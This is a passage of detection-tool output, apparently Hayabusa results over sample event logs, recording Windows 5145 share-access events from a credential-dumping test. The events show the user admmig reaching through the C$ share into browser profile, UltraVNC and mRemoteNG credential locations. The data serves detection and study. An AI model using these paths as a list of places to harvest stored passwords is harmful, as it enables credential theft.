Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.720 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.720 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.720 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.736 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.736 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\Administrator\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.736 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.736 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.751 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.751 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File 
Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.767 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.767 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.767 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.783 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.783 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.783 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.798 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump 
via network share.evtx +2021-12-12 20:53:15.798 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.798 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password 
Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.831 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.831 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.831 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.846 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.846 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.846 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\NETGATE 
Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.862 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.862 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.862 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.878 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.878 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.878 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.893 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.893 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.893 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.909 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.914 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 
+2021-12-12 20:53:15.914 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.914 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user 
file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.942 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramFiles(x86)\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.942 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAMFILES\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.942 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAMFILES\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user 
file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.958 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramFiles(x86)\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.958 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files (x86)\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.958 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAM FILES\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.973 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAM FILES\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser 
dump via network share.evtx +2021-12-12 20:53:15.973 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files (x86)\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.264 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.264 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.264 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: 